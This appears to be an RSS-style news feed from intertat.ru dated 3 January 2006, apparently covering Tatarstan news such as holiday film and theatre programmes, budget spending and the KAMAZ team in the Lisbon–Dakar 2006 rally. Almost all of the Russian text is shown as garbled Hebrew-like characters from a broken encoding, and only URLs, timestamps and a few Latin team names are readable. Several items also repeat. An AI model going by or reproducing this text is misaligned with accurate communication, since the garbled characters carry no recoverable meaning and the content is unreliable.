ֱַּ׳ֱ ֱִֹֽ־ֹ׃װֱֳֹֹׂ אװֱֹ־׃ַֻֿֿ ֱֿׂ־ֱ בֱּֽ׃ ףֱֱָ׀ֿ׳, ׳׃װֵׂװֹ׳ֹ׃״ ׃ ִֹּֽֽֿֿ ׃ֵֽ״ֹֽׁ, ׃ ׳ׂױֹּ ֹֽ ױ׳ִֵֵּֽֿ־ֹׁ ֿ ֳֵֵּ׳ֽֿ ׳ִֵֵּ־ֹֹ ׃ִֵׂ׃װ׳ ־ֱ ׀ֲֵֹֿׂׂװֵ־ֵֹ ֻ׳ֱׂװֹׂ. ק ֱֿׂ־ֵ ־ֵ ׀ֱֻֿ ֵֵ ־ֵ ׀ֿ׃װֹֹּֿׂ ִֽֿ ׃׀ֱֳֵֹּ״־ֿ ִּׁ ִָּֽֿֿ ׃ֵֵֽ. טֿװׁ ׂ־ֻֿ ׳װֹֿׂ־ַֿֿ ײֹּ״ׁ ִֵ׃״ ִֵ׃װ׳ױֵװ ֱֻװֹ׳־ֿ, ױ ִֵּֽֿֿײֹ ־ֵװ ִֵ־ֵַ ־ֱ ׀ֻֿױ׀ֻױ ֱֲַּֿױ׃װֵֿׂ־־ַֿֿ ײֹּ״ׁ. נֽֿֿ״ ׳ ֵֵׂ־ֹֹ װֿ ׀ֲֵּֽֿׂ ׀ֹׂ׳ֱ־ תֱֻֿ־ עפ «ןֲ ױּױֵ־ֹֹ ײֹֹּ־ָ ױ׃ּֿ׳ֹ ִָּֽֿֿ ׃ֵֵֽ» ֹ ׀ִֿ׀ֱֱַֽֽֿׂׂ ֲֵֿ׃׀ֵֵ־ֹׁ ײֹּ״ֵֽ ִָּֽֿֿ ׃ֵֵֽ, ִֵ׃װ׳ױְֱׁ ׳ ֱֱָֻֽׂ זֱִֵֵּׂ״־ֿ ֳֵֵּ׳ֿ ׀ֱַֽֽֿׂׂ «צֹּ״ֵ 2002- 2010 ַַ. ׳ עֵ׃׀ױֲֵֹֻּ פֱװֱׂ׃װֱ־». עֱֱֳֵֹֹּׁ װָֹ ׀ֱַֽֽֿׂׂ ֹ ׀ֿ׳ֱֹּּֿ ִּֽֽֿֿ ְװֱֹ־׃ֹֻֽ ׃ֵֽ״ֽׁ ׳ֿ׀ּֿװֹװ״ ׃׳ְֿ ֵֽװױ ׳ ײֹ־״. «הּׁ ֵּֿ׳ֱֵֻ ׀ֲֵֹֿׂׂװֵ־ֵֹ ׃ֲֿ׃װ׳ֵ־־ַֿֿ ײֹּ״ׁ ִֿ־ֿ ֹ ׃ֱָֽ ֱַּ׳־ָ ׃ֲֿװֹ ׳ ײֹ־ֹ, - ׃ֱֱֻּ בֱּֽ׃ ףֱֱָ׀ֿ׳, ׳׃װױ׀ֱׁ ׀ִֵֵׂ ׃ֱ׃װֹּ׳ֹֽ ֱֱֲִּֿװֵֹּֽׁ ױ׳ִֵֵּֽֿ־ֹ ֿ ֳֵֵּ׳ֽֿ ׳ִֵֵּ־ֹֹ ׃ִֵׂ׃װ׳ ־ֱ ׀ֲֵֹֿׂׂװֵ־ֵֹ ֻ׳ֱׂװֹׂ. - ן׃ֲֵֿ־־ֿ ׀ֹׁׂװ־ֿ, װֿ װֿ ׃ּױֹּֿ׃״ ׀ִֿ מֿ׳ ִַֿ, ֻֿװֿׂ װֵ׀ֵׂ״ ֱ׀ֽֿ־ֹװ׃ׁ ־ֱִַּֿֿ. נױ׃װ״ ׳ ׳ֱֵֽ ־ֿ׳ֽֿ ִֵֽֿ ׳׃ֱִֵַ ֱֳׁׂװ ׃ֱ׃װ״ֵ, ׃ֱַּֿ׃ֵֹ ֹ ֹֽׂ».מֵ ׳׃ֵ 14 ִָּֽֿֿ ׃ֵֵֽ ׳׃װֵׂװׁװ ־ֱ׃װױ׀ְֱֹ מֿ׳ ִַֿ ׳ ׃׳ָֹֿ ־ֿ׳ָ ֻ׳ֱׂװֱָֹׂ. װֿ ׃ַֽֿױװ ׃ֱִֵּװ״ װּֿ״ֻֿ װֵ, ֻװֿ ױײֵ ׀ֹׂ׃ֽֿװֵּׂ ײֹּ״ֵ ־ֱ ׳װֹֿׂ־ֽֿ ׂ־ֵֻ, ױ׃׀ֵּ ׀ּֿױֹװ״ ִֵ־״ַֹ ׀ֿ ׳ֱִ־־ֽֿױ ֱַּ׳ֿ ֱִֹֽ־ֹ׃װֱֳֹֹׂ ױ׳ִֵֵּֽֿ־ְֹ ֹ ׃ֿ׳ֵֹּׂ ׃ִֵֻּױ ֻױ׀ֹּ-׀ֱִֿׂײֹ. ן׃װֱּ״־ֽ ײֵ ֵֵ ׀ִֵׂ׃װֿׁװ װֹ ׀ֹׁׂװ־ֵ ָּֿ׀ֿװ. מֿ ־ֿ׳ִַֿֿ־ֹ ׀ֱִׂ־ֹֻ ֿ־ֹ ׳׃װְֱֵׂװ ׃ ֱִֿׂ׃װ״ְ ֹ ־ֱִֵײִֿ. ק ֱֲִֵֵֻׂ ׳ פֱװֱׂ׃װֱ־ ֱ ׃ֵװ ׃ִֵׂ׃װ׳ ֱִֵֵֶּׂ״־ַֿֿ ְֲִײֵװֱ ׀ֿ׃װױ׀ֹּֿ ֱֵֻּׂ׃װ׳ ־ֱ 85 ּֽ־. ׂױֲֵּhttp://intertat.ru/index.php?id=80166ק ֱֲִֵֵֻׂ 2005 ֱִַֿ ׳ ֱֱָֻֽׂ ֱִֵֵֶּׂ״־ֿ ֳֵֵּ׳ֿ ׀ֱַֽֽֿׂׂ «קֱֳֹֻ־ֿ׀ֱֶֹֻּֿׂװֱֹֻ» ֱ ׃ֵװ ׃ִֵׂ׃װ׳ ֱִֵֵֶּׂ״־ַֿֿ ְֲִײֵװֱ ׳ פֱװֱׂ׃װֱ־ ׀ֿ׃װױ׀ֹֹּ ׳ֱֳֹֻ־ ׀ֿׂװֹ׳ ֵַ׀ֱװֹװֱ ק, ׀ֵֹֹֹּּֽֿֿװ־ֱׁ ֹ ֳִֵֹֹֽ־׃ֵֹֻ װֵֻֽֿֿׂ־װֵ־ֵׂ ־ֱ ֲֿױְ ׃ױֽֽױ 12 615 256,2 ׂױֲ., ׃ֲֹֹּֿֿ ׳ ץ׀ֱׂ׳ֵּ־ֹֹ ׀ֿ ֱֱֳֶֹֹֽׂ ֹ ֳִֵֹֹֽ־׃ֻֿ װֵָ־ֵֹֻ םֹ־ֹ׃װֵׂ׃װ׳ֱ ֱִׂ׳ֱָֿֿׂ־ֵ־ֹׁ עפ.ֲֵֿ׃װ׳ֿTue, 03 Jan 2006 12:05:00 +0300ק ֱֲִֵֵֻׂ 2005 ֱִַֿ ׳ ֱֱָֻֽׂ ֱִֵֵֶּׂ״־ֿ ֳֵֵּ׳ֿ ׀ֱַֽֽֿׂׂ «קֱֳֹֻ־ֿ׀ֱֶֹֻּֿׂװֱֹֻ» ֱ ׃ֵװ ׃ִֵׂ׃װ׳ ֱִֵֵֶּׂ״־ַֿֿ ְֲִײֵװֱ ׳ פֱװֱׂ׃װֱ־ ׀ֿ׃װױ׀ֹֹּ ׳ֱֳֹֻ־ ׀ֿׂװֹ׳ ֵַ׀ֱװֹװֱ ק, ׀ֵֹֹֹּּֽֿֿװ־ֱׁ ֹ ֳִֵֹֹֽ־׃ֵֹֻ װֵֻֽֿֿׂ־װֵ־ֵׂ ־ֱ ֲֿױְ ׃ױֽֽױ 12 615 256,2 ׂױֲ., ׃ֲֹֹּֿֿ ׳ ץ׀ֱׂ׳ֵּ־ֹֹ ׀ֿ ֱֱֳֶֹֹֽׂ ֹ ֳִֵֹֹֽ־׃ֻֿ װֵָ־ֵֹֻ םֹ־ֹ׃װֵׂ׃װ׳ֱ ֱִׂ׳ֱָֿֿׂ־ֵ־ֹׁ עפ. ק ֱֱָֻֽׂ ֱִֵֵֶּׂ״־ֿ ֳֵֵּ׳ֿ ׀ֱַֽֽֿׂׂ «ףֱֱָׂ־ ֱֲִֵֹװ» ׀ֿ׃װױ׀ֹֹּ ׀ֵׂ׀ֱֱׂװ ֱּ־װױ׃, ָױֱַּֽֿ, ָױֽױֹּ־ מנט, ָױֽױֹּ־ ֵַׂױּׁׂ, ׃ִֵׂ׃װ׳ֱ ָֹ ׳׳ִֵֵ־ֹׁ ֹ ׃ֱֱָֿׂ׃־ֹײְֱֹ ׀ֵׂ׀ֱֱׂװ בֻװֿ׃ ־ֱ ֲֿױְ ׃ױֽֽױ 619 050 ׂױֲ. נֿ ֱִֵֵֶּׂ״־ֿ ֳֵֵּ׳ֿ ׀ֱֵַֽֽֿׂׂ «מֵֿװּֿײ־ֵ ֵֽׂ ֲֿׂ״ֲ ׃ װױֲֵֻׂױֵּֽֿ ׳ עֿ׃׃ֹֹ» ׀ּֿױֵ־ ׀ֿׂװֹ׳ֿװױֲֵֻׂױֵּ־ֵ ׀ֵׂ׀ֱֱׂװ ֲֹֻֽֿֿ, ֲֵֻּֽֽֿֿ, ׀ֿׂװֲֹֻֽֿֿ, ֹֿ־ֱִֹֹ, נבףכ, ֹּ-ֲױװּֿ ־ֱ 4 592 140 ׂױֲ. ק׃ֵַֿ ׀ֿ ׳׃ֵֽ ֱִֵֵֶּׂ״־ֽ ֳֵֵּ׳ֽ ׀ֱֱַֽֽֽֿׂׂ ֱ ׃ֵװ ֱִֵֵֶּׂ״־ַֿֿ ְֲִײֵװֱ ֵׂ׃׀ױֱֲֹֻּ ׀ּֿױֱֹּ ֱֵֻּׂ׃װ׳ֵ־־ָ ׀ֵׂ׀ֱֱׂװֿ׳ ־ֱ 85 009 252,2 ׂױֲ. ק ֹֽ־ֵֹ ֱֻ־ֹֻױּ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֵ ֹֻ־ֿװֱֵװׂ ׀ֿׂ׳ִֵױװ ִֵװ׃ֵֹֻ ֹֻ־ֿ׀ֱִׂ־ֹֹֻhttp://intertat.ru/index.php?id=80164הֿ 10 ׁ־׳ֱׁׂ ׳ ַֿ׃ױֱִׂ׃װ׳ֵ־־ָ ֹֻ־ֿװֱֵװֱָׂ ֹ ֹֻ־ֿױ׃װֱ־ֿ׳ֱָֻ ׳׃ֵָ ִַֿֿֿׂ׳ ֹ ֱֿׂ־ֿ׳ ֵׂ׃׀ױֲֹֹֻּ ֲױִױװ ׀ִָֹֿֿׂװ״ ֹֻ־ֿ׀ֱִׂ־ֹֹֻ «ק ֵֹֽׂ ׃ֱֻֻֿ ֹ ׀ְֵֹֻּׂ־ֹ», ׃ֲֹֹּֿֿ ׳ םֹ־ֹ׃װֵׂ׃װ׳ֵ ֻױּ״װױׂ עפ. ֻױּ״װױֱׂTue, 03 Jan 2006 11:19:16 +0300הֿ 10 ׁ־׳ֱׁׂ ׳ ַֿ׃ױֱִׂ׃װ׳ֵ־־ָ ֹֻ־ֿװֱֵװֱָׂ ֹ ֹֻ־ֿױ׃װֱ־ֿ׳ֱָֻ ׳׃ֵָ ִַֿֿֿׂ׳ ֹ ֱֿׂ־ֿ׳ ֵׂ׃׀ױֲֹֹֻּ ֲױִױװ ׀ִָֹֿֿׂװ״ ֹֻ־ֿ׀ֱִׂ־ֹֹֻ «ק ֵֹֽׂ ׃ֱֻֻֿ ֹ ׀ְֵֹֻּׂ־ֹ», ׃ֲֹֹּֿֿ ׳ םֹ־ֹ׃װֵׂ׃װ׳ֵ ֻױּ״װױׂ עפ. ק ֵׂ׀ֵׂװױֱׂ ׀ֱִׂ־ֹ־ָ ֹֻ־ֿ׀ֱֻֿֿ׳ ׳ְֵֻּ־ ֶֹּ״ֽ-׃ֱֹֻֻ, ׀ְֵֹֻּׂ־ֵ׃ֵֹֻ ֹֻ־ֵּֿ־װ, ֽױּ״װֶֹּ״ֽ. תֹׂװֵֹּ ױ׳ִֹׁװ ־ֿ׳ֵ ֿׂ׃׃ֹ׃ֵֹֻ ֹֻ־ֵּֿ־װ. װֿ - ׀ּֿ־ֵֽֿװֱׂײ־ ֱ־ֱֳֹֹֽֿ־־ ֶֹּ״ֽ «‎ֵֻּױ־ֹֻ» (ֹ׃װֹֿׁׂ ׳ֵׂ־ֿ׃װֹ ֹ ֽױײֵ׃װ׳ֱ, ׳ֲֵּֿ׃װ׳ֱ ֹ ױֱִֹ, ׃ֱֻֿ־ָ ׀ֵׂ׳ֱֵׂ־ֹ ֹ ֵּֿ׳ֵֵ׃ָֹֻ ױ׳׃װ׳). ףֱֻֿ־ָ ׀ֵׂ׃ֿ־ֱײֵ ׳ ֶֹּ״ֵֽ ֿ׳ױֹ׳ְֱװ ֹ׳ֵ׃װ־ֵ ֱֻװֵׂ: ו׳ֵַ־ֹ-םֹֿׂ־ֿ׳, וֶֹֽ ֶֹֹׂ־, םֱֹׂ־ֱ בֵֻּ׃ֱ־ִֿׂ׳ֱ, אֹׂ חֱּ״ֳֵ׳, חֵַֹֿׂ פֱֱׂװֹֻֿׂ־. הּׁ ֱֵּֽ־״ָֹֻ ֹׂװֵֵּ ֲױִֵװ װֱׂ־׃ֹּֿׂ׳ֱװ״׃ׁ ׃ֱֻֿ־ ֽױּ״װֶֹּ״ֽ «בֱֵּ נֿ׀ֿ׳ֹ ֹ פױֱַֹׂ־ ֵֽ» - ׳ֵ׃ֱֵּׁ ֹ׃װֹֿׁׂ ֿ ׀ְֵֹֻּׂ־ָֹׁ בֵֹּ ֹ ֵַֿ ִׂױֵ, ְֲּ׳ֹ ֱַּ׳־ַֿֿ ֵַֿׁׂ ֹ ֱֻׂ׃ֱ׳ֳֹ לְֱֲ׳. נְֵֹֻּׂ־ֵ׃ֹֻ ֱ־ֱֳֹֹֽֿ־־ ֶֹּ״ֽ «מֵ־ֱֱֻ ֹ גֱֱֱֲׂׂ׃» ׃ִֵֿׂײֹװ ׀ֵ׃־ֹ ׳ ֹ׃׀ּֿ־ֵ־ֹֹ יּ״ֹ לֱַױװֵ־ֻֿ ֹ ַׂױ׀׀ «םױֹֽ פּּֿׂ״».ק ׀ֱִׂ־ֹ־ֵ ִ־ֹ ׃ֿ׃װֿׁװ׃ׁ װֱֻײֵ ׀ֵֽׂ״ֵׂ ֿׂײִֵ׃װ׳ֵ־׃ֻֿ ׃ֱֹֻֻ «גֱִֹּׂ» (ףב) ֹ ־ֿ׳ִַֿֿ־ֵ ִֵֹֹֻֽֿ «ףֱ׃װֹּ׳ ױֲ». זֹּ״ֽ «גֱִֹּׂ» ֱׂ׃׃ֱֻ׳ֱֵװ ֿ ִׂױײֲֵ, ֲֵ׃ֻֿׂ׃װֹֹ ֹ ױִֵ׃ֱָ. נֱֵֻׂׂ׃־ֵ ׃׀ֳֵֵֶֶֻװ, ױ׳ֱֵֻּװֵּ״־ ׃ְײֵװ ֹ ױֱ׃װֵֹ ַֹּּֿ׳ױִ׃ֻֿ ׳ִֵ קױ׀ֹ חֲֵַּֿׂ- ֱֱַׂ־װֹׂױְװ ֵֵָֿֿׂ ־ֱ׃װֵֿׂ־ֵֹ ֹ ִֵװֽׁ, ֹ ׳ֿׂ׃ּֽ ק׃ֵ ׃ֵֽ״ֵ ִֿ׃װֱ׳ֹװ ױִֿ׳ּֿ״׃װ׳ֵֹ ֹ ׀ֿׂ׃ֽֿװׂ ֶֹּ״ֱֽ «ףֱ׃װֹּ׳ ױֲ».הּׁ ִֵװ׃ֻֿ ֹ ִֵּֽֿֿײ־ֿ ֱױִֹװֹֹֿׂ ׀ִֵׂ־ֱ־ֱֵ־ ֽױּ״װֹ׀ֱֳֹֹֻּֿ־־ֵ ִֵֹֹֻֽֿ: «םֱֱֱִַ׃ֱֻׂ», «חױֱֲֻ גֲֿ ֻ׳ֱֱִׂװ־ֵ װֱ־», «נִֿ׳ִֿ־ֱׁ ֱֲׂװ׳ֱ», «כֿװ».כֿ־ֵ־ֿ ײֵ, ׳ ׀ֱִׂ־ֹ־ ֵׂ׀ֵׂװױֱׂ ׳ְֵֻּ־ ֹ ֹֻ־ֶֹּֿ״ֽ, ױײֵ ֱ׳ֵֿ׳ֱ׳ֵֹ ׀ֿׂ־ױְ ְֲּֿ׳״ ֹׂװֵֵּ: «םֻֿֿֿׂ», «ף־ֵײ־ֱׁ ֵֻּֿֿׂ׳ֱ» «ןֵּ־ֵ־ֻֿ עױִּֿ״ֶ», «תּֿֿװֵ ֱַֿׂ», «םֱֵּ־״ֱֻׁ ׀ֹׂ־ֳֵ׃׃ֱ» ֹ ֽ־ֵַֹֿ ִׂױֵַֹ.נֹׂ ׀ֿׂ׳ִֵֵ־ֹֹ ֹֻ־ֿ׀ֱִׂ־ֹֻֿ׳ «ק ֵֹֽׂ ׃ֱֻֻֿ ֹ ׀ְֵֹֻּׂ־ֹ» ִּׁ ֲֵׁׂװ װֱֻײֵ ֲױִױװ ֱַֿׂ־ֹֿ׳ֱ־ ׃ֳֵ־ֵֹ׃ֵֹֻ ׀ִֵׂ׃װֱ׳ֵּ־ֹׁ, ַֹׂ, ֻֿ־ֻױׂ׃, ִֹ׃ֻֿװֵֹֻ. פֱֻ, ׀ֱִׂ־ֹ־ֱׁ ֹֻ־ֿ׀ֱֱַֽֽֿׂׂ «מֿ׳ִַֿֿ־ֹ ׃ֵׂ׀ֱ־װֹ־» ֲױִֵװ ׀ִָֹֿֿׂװ״ ׳ םִֵּֿֿײ־ֽֿ דֵ־װֵׂ «כֿ׃ֽֿ׃» תֱֹ־׃ֱֻ.ק ֹֻ־ֿװֱֵװֵׂ «יְֹּּֿ־» .וֱֲּױַֹ װֱֳִֹֹֿׂ־־ֿ ׀ִֿׂױװ ֿׂײִֵ׃װ׳ֵ־׃ֵֹֻ ׀ִֵׂ׃װֱ׳ֵּ־ֹׁ «תֹֽ־ׁׁ ׃ֱֱֻֻ», ֱ װֱֻײֵ ֽױּװ״ֻֿ־ֳֵׂװ, ֹֻ־ֿ׀ֱַֽֽֿׂׂ «ק׃ֵ ׃ֵֽ״ֵ ׳ ֹֻ־ֿ».גּֿ״ֱׁ ׀ֱֱַֽֽֿׂׂ ׀ִַֿֿװֿ׳ֵּ־ֱ ֹֻ־ֿװֱֵװֽֿׂ «מֿ׳ ׳ֵֻ» ֱִַֿֿׂ פֵװְֹ. תִֵ׃״ ִּׁ ִֵװֵ ֲױִױװ ֱַֿׂ־ֹֿ׳ֱ־ װֱֵװֱֹּֿׂ׳ֱ־־ֵ ׀ִֵׂ׃װֱ׳ֵּ־ֹׁ «נֵָֹֿ־ֵֹ מֿ׳ַֿֿ חֱִֿ», ׃ֳֵ־ֵֹ׃ֵֹֻ ִֵ׃װ׳ֹׁ «ק ־ֵֻֿװֽֿֿׂ ַֿ׃ױֱִׂ׃װ׳ֵ», ־ֿ׳ִַֿֿ־ֹ כקמ «ק ַֿ׃װָׁ ױ ׃ֱֹֻֻ».ק ִֿ׃ױַֿ׳ֽֿ ֳֵ־װֵׂ גױֹ־׃ֱֻ ׳ ׀ֱִׂ־ֹ־ֵ ִ־ֹ ׀ִָֿֿׁׂװ ־ֿ׳ִַֿֿ־ֵֹ ׀ִֵׂ׃װֱ׳ֵּ־ֹׁ «תֱִׂ׳׃װ׳ױ, תֹֽױֱֻ, תֱֹֽ!», ׃׀ֱֳֵֹּ״־ֵ ֹֻ־ֿױװֵׂ־־ֹֹֻ ִּׁ ִֵװֵ-ֹ־׳ֱִֹּֿ׳.נֿ׃ֵּ װֵָׂ װֱ׀ֿ׳ הֱֱֱֻׂ ׳׀ִֵֵֹׂ - קֱִֹֹּֽׂ ‏ֱַֹ־http://intertat.ru/index.php?id=80163מֱֱֻ־ױ־ֵ ׳ֵֵֽֿׂ ׳ םֱֻֻֿֿׂ ֱ׳ֵֹּׂ׃ׁ ׀ֵׂ׳ ־ֱ בֱֶֹֻׂ־׃ֻֽֿ ֻֿ־װֹ־ֵ־װֵ ֹ װֵׂװֹ ׃ ־ֱֱֱּ ַֿ־ֻֿ װֱ׀ ֵֽײִױ־ֱִֿׂ־ַֿֿ ֱֹּּׂ-ֱֱֶֽֿׂ־ֱ «לֹ׃׃ֱֲֿ־ - הֱֱֻׂ 2006». ק׀ִֵֵֹׂ ׃ ׃ֱַֽֿֿ ־ֱֱֱּ ׃ֵֿׂ׳־ֿ׳ֱ־ֹ - ֹֻ׀ֱײ קֱֱִֹֹּֽׂ ‏ֱַֹ־ֱ.׃׀ֿׂװTue, 03 Jan 2006 11:08:40 +0300מֱֱֻ־ױ־ֵ ׳ֵֵֽֿׂ ׳ םֱֻֻֿֿׂ ֱ׳ֵֹּׂ׃ׁ ׀ֵׂ׳ ־ֱ בֱֶֹֻׂ־׃ֻֽֿ ֻֿ־װֹ־ֵ־װֵ ֹ װֵׂװֹ ׃ ־ֱֱֱּ ַֿ־ֻֿ װֱ׀ ֵֽײִױ־ֱִֿׂ־ַֿֿ ֱֹּּׂ-ֱֱֶֽֿׂ־ֱ «לֹ׃׃ֱֲֿ־ - הֱֱֻׂ 2006». ק׀ִֵֵֹׂ ׃ ׃ֱַֽֿֿ ־ֱֱֱּ ׃ֵֿׂ׳־ֿ׳ֱ־ֹ - ֹֻ׀ֱײ קֱֱִֹֹּֽׂ ‏ֱַֹ־ֱ.ןֱֲׁ ׀ֿׂװׁײֵ־־ֿ׃װ״ װֵׂװ״ֵַֿ װֱ׀ֱ ׃ױ׀ֱֱֵֶֽֿׂׂ־ֱ מֱִֿ -ׂ עֱֱִֹ- 672 ֵֹֻּֽֿװֱׂ. י ־ָֹ 314 ֻֽ - ׃׀ֳֵױֱ׃װֻֿ ֹ ִ׳ֱ ֱֹּֿ־ֱ: ׳ ־ֱֱֵּ - 237 ֻֽ, ׳ ֻֿ־ֳֵ - 121 ֻֽ. מֱ׳ֱ־ֵֹ װַֿֿ װֱ׀ֱ ױײֵ װֹׂ ֱֱׂ ֶַֹױֹֿׂׂ׳ֱּֿ ׳ ֹ׃װֹֹֿׂ ֱֹּּׂ, ־ֿ װֱׂ׃׃ֱ ׃׀ֳֵױֱ׃װֱֻ ׃ֿ׳ֵֵׂ־־ֿ ־ֵֹ׳ֵ׃װ־ֱ. נֵֵׂ׃ֵֵ־ֹׁ ׳ֱִֹ, ֱֻּ׃׃ֵֹ׃ֵֹֻ ּֿ׳ױֹֻ םֱֻֻֿֿׂ, ׳ִָֿׁװ ׳ ׀ֱַֽֽֿׂׂױ ֹ ֵֹֽ־־ֿ ִֵ׃״ ַֿ־ֱֹֻֽ ׃װֹּֿֿ ֿ׀ֱ׃ֱװ״׃ׁ ׀ֵׂ׳ָ ־ֱֹװֵּ״־ָ ֲֹֻֿֿ ׳ ־ֱ׳ֱֳַֹֹֹ.פֵֽ ־ֵ ֵֽ־ֵֵ, ֹֻ׀ֱײ - ִֵֹּׂ ַֿ־ֻֿ ׃׀ֱׂ׳ֹּ׃ׁ ׃ֿ ׳׃ֵֹֽ װׂױִ־ֿ׃װֹֽׁ, ׀ִֵֵּֿֿׂ׳ ׳ֵ׃״ ׀ױװ״ ֱ 3 ֱ׃ֱ 25 ֹֽ־ױװ 21 ׃ֵֻױ־ִױ. םֱּֿ װַֿֿ, ֱ ִֵֹּֽֿׂ ׀ִֿװׁ־ױֹּ׃״ ֹ ִׂױֵַֹ ֱֱֻֽֿ׳׃ֵֹֻ ֹֻ׀ֱײֹ, ׀ֿ ֵׂױּ״װֱװֱֽ ִ׳ױָ ׀ִִֵׂױָֹ װֱ׀ֿ׳ ֱֱֻֿ׳ֵֹ׃ׁ ׳ ֹ׃ֵּ ֱױװ׃ֱִֵֿׂ׳ ַֿ־ֹֻ. כבםבת, ׳ִֵֽֿ זֱִֹׂױ׃ֽֿ כֱֲֹֿׂ׳ֽ, ׀ֵֵׂ׃ֹֻּֿ ׃ 58 ׀ֳֹֹֹֿ ־ֱ ֵװ׳ֵׂװױְ, ֿװ׃װֱ׳ ֿװ ‏ֱַֹ־ֱ ־ֱ 14 ֹֽ־ױװ 5 ׃ֵֻױ־ִ. ףֵֵַׂ עֵֵװ־ֹֻֿ׳, ֻֿװֿׂ ־ֱֱֻ־ױ־ֵ ֲּ 11-ֽ, װֵ׀ֵׂ״ ֱ־ֱֵֹֽװ ׳ֿ׃״ֽױְ ׀ְֳֹֹֿ ֹ ֿװ׃װֱֵװ ֿװ ֱִֵֹּׂ ־ֱ 28 ֹֽ־ױװ 10 ׃ֵֻױ־ִ.ןִ־ֱֻֿ ׃ֿ׀ֵׂ־ֹֹֻ ־ֱָֹ ַֿ־ֹֻֿ׳ װֿײֵ ־ֵ ְִֵּֽׂװ ֹ ֱׂ־ֱֳֹ ׳ֿ ׳ֵֵֽׂ־ֹ ֵֽײִױ ֱ׳װֲֹֹּֽֽֿֿׁ, ִֹֹּׂױְֹֹֽ ׳ ַֿ־ֵֻ, ־ֵ װֱֻ ױײ ֹ ׳ֱֵֹֻּ. מֱ 7 ֹֽ־ױװ 6 ׃ֵֻױ־ִ ֿװ׃װֱֵװ ֿװ כבםבתֱ קֱֱִֹֹּֽׂ ‏ֱַֹ־ֱ יקוכן ׀ִֿ ױ׀ֱׂ׳ֵּ־ֵֹֽ םֹֹֻֻ גֱֹֿ־ֱ. פֵׂװֹ ֱ׳װֲֹּֽֿֿ״ - ֱַּּֿ־ִ׃ֹֻ םבמ - ױ׃װױ׀ֱֵװ ִֵֹּׂױ 9 ׃ ׀ּֿֿ׳ֹ־ֿ ֹֽ־ױװ.ףִֵַֿ־ׁ־ֹ װֱ׀ - ׂ עֱֱִֹ - ץֱֱֱׂװ ־ֱ׳ֱ־ «קֿֿׂװֱֹֽ ׀ױ׃װ־ֹ». וַֿ ׀ֿׂװׁײֵ־־ֿ׃װ״ 639 ֻֽ, ֹ ֻֿװָֿׂ ִ׳ֱ ֱֹּֿ־ֱ ׀ֿ 56 ֹ 197 ֻֽ ֹ ׃׀ֳֵױֱ׃װֻֿ ִֹּ־ֿ 386 ֻֽ.טֿׂ־ֱֹֻ ׃װֱׂװֱ ֹ ִ׳ױָ ִ־ֵ ַֿ־ֻֿ ׀ֿ ו׳ֿׂ׀ֵ, ׀ֿ ֹ־ֱֳֶֹֹֽֿׂ ֱֳֶֹֹּֿ״־ַֿֿ ׃ֱװֱ ֱֻֽֿ־ִ «כבםבת-םֱ׃װֵׂ» װֱֻֿ׳ֱ:גֵֵּֿ ֵ׃װֹ ֱ׃ֿ׳ ׀ֱִּֿ״ יֽ׀ֵֹֹׂ ׳ לֹ׃׃ֱֲֿ־ֵ ֽֿ׳ֱֱּ׃״ ־ֵ׃ֻֿ־ֱֵֽֽ ֽ־ַֿֿׁ־ֽ ְִּ׃ֹֻֽ ׀ֿװֻֽֿֿ, ׃װֱֵֻ׳ֹֽ׃ׁ ֻ ׃װֱׂװֿ׳ֽֿױ ׀ִֹֿױֽױ ֱ׳װֱֱֶֽֿֿׂ־ֱ «לֹ׃׃ֱֲֿ־-הֱֱֻׂ 2006». תֵֵֹּׂ ֱ׳ֱֿׂײֹ׳ְֱֵֵ. הֵ׃װ׳ֹװֵּ״־ֿ: «ן, ׃׀ֿׂװ, - װ ֹֽׂ!». פֱַֻֿֿ ִֵֹ־ֵ־ֹׁ ׳ ִֵֹ־ָ ׃׀ֿׂװֹ׳־ָ ׀ֹׂ׃װֱׂ׃װָֹׁ, ֹ ׳ ֱ׃װ־ֿ׃װֹ, ֻ ֱֱִֻֿׂ׳׃ֻֽֿױ ֱֹּּׂ, ֱׂ׃ֻׂױֵ־־ֽֿױ ֵ׳ֿׂ׀ֵ׃ֻֿ ׀ֵׂ׃׃ֿ ׀ֲִֿֿ־ֿ ׀ִֵׂ־ֿ׳ִַֿֿ־ֵֽױ ֵֵֶׂ׳ֵֻׂױ, ֽֿײֵװ ׀ֱֿ׳ִֹֿ׳ֱװ״ ְֱֲּׁ ַֿ־ֱֻ. י ְֱֲּׁ ׃װֱׂ־ֱ. מֿ ׃ִֵַֿ־ׁ װֿװ ײֲֵֹׂ ׳׀ֱּ ־ֱ ׃װֳֹּֿױ נֿׂװױֱַֹֹּ.475 ױֱ׃װ־ֹֻֿ׳ ֵֽײֻֿ־װֹ־ֵ־װֱּ״־ַֿֿ ֱֹּּׂ - 232 ֽֿװֳֹֹֻּֿ׃װֱ, 174 ֹֻ׀ֱײֱ ֵַֻּֿ׳ָ ֱ׳װֲֵֹּֽֿֿ ֹ ִײֹ׀ֿ׳, 69 ֹֻ׀ֱײֵ ַׂױֿ׳ֹֻֿ׳ - ־ֿ׳ ִֵֻֿׂׂ «הֱֱֱֻׂ», ױ׃װֱ־ֿ׳ֵּ־־ ֵֵ ִֿ ׳ְֵֻּ־ֹׁ ׃׀ֿׂװֹ׳־ָ ָֿׂ־ֵֽֿװֿׂ׳. גֵַֿֿװֿ׳־ֿ׃װ״ ׃׀ֿׂװֹ׳־ֿ ֱֻ׳ֱּ״ֱִֻ ֲױִױװ ֲֵֿ׃׀ֵֹ׳ֱװ״ 108 ֵַֻּֿ׳ָ ֹ 129 ַׂױֿ׳ָ ֱ׳װֲֵֹּֽֿֿ װֵָ־ֵֹ׃ַֻֿֿ ׃ֿ׀ֿׂ׳ֿײִֵ־ֹׁ.כֱֻ ױײֵ ׃ֱֲּֿֿֿ׃״, ֵֹֻּֿ׃װ׳ֿ ױֱ׃װ־ֹֻֿ׳ ַּֽֿֿ ֲװ״ ֲּֿ״ֵ, ֵ׃ֹּ ֲ ־ֱֱֻ־ױ־ֵ ־ֵ ֲֹּ ִֹ׃ֻ׳ֱֳֶֹֹֹּֿׂ׳ֱ־ ׳׃ֵ 5 ׃׀ֿׂװֹ׳־ָ ַׂױֿ׳ֹֻֿ׳ הבז ֱַּּֿ־ִ׃ָֹֻ ֱֻֽֿ־ִ «De Rooy 2006» ֹ «Hans Bekx team sport». נִֵׂ׃װֱ׳ֹװֵּ״ ֹֻֽֿ׃׃ֱֱֹׂװֱ ֱֹּּׂ Robert Lagulhon ־ֱ ׀ֵׂ׃׃-ֻֿ־ֵֵֶׂ־ֳֹֹ 